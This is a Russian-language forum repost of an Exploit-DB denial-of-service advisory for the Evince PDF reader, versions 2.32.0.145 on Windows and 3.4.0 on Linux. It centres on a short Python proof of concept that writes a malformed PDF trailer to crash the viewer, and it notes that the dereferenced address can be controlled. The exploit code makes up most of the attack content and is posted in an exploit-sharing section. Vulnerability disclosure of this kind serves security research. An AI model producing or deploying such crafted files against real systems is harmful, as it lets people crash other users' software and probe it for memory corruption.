Exploit Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28679
Проверка EDB
  1. Пройдено
Автор
DEVA
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
null
Дата публикации
2013-10-02
Код:
Advisory Information :
======================
Title : Evince 2.32.0.145 - Denial Of Service
Product : Evince pdf reader
Vendor Homepage: https://projects.gnome.org/evince/
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior release
Tested Version : Windows 2.32.0.145, Linux 3.4.0
Tested On : Windows 7 & 8, Ubuntu 13.04
Discovered By : Deva, Securimag Team
 
Introduction :
==============
Evince is a document viewer for multiple document formats. 
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.
 
- Copied from : https://projects.gnome.org/evince/

Proof Of Concept :
==================
You can control dereferenced address by changing value of /Root (here 42)

#!/usr/bin/python

pdf = """trailer
<<
/Size 1337
/Root 42 0 R
>>
startxref
1
%%EOF
"""
 
filename = "EvincePoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
 
Источник
www.exploit-db.com

Похожие темы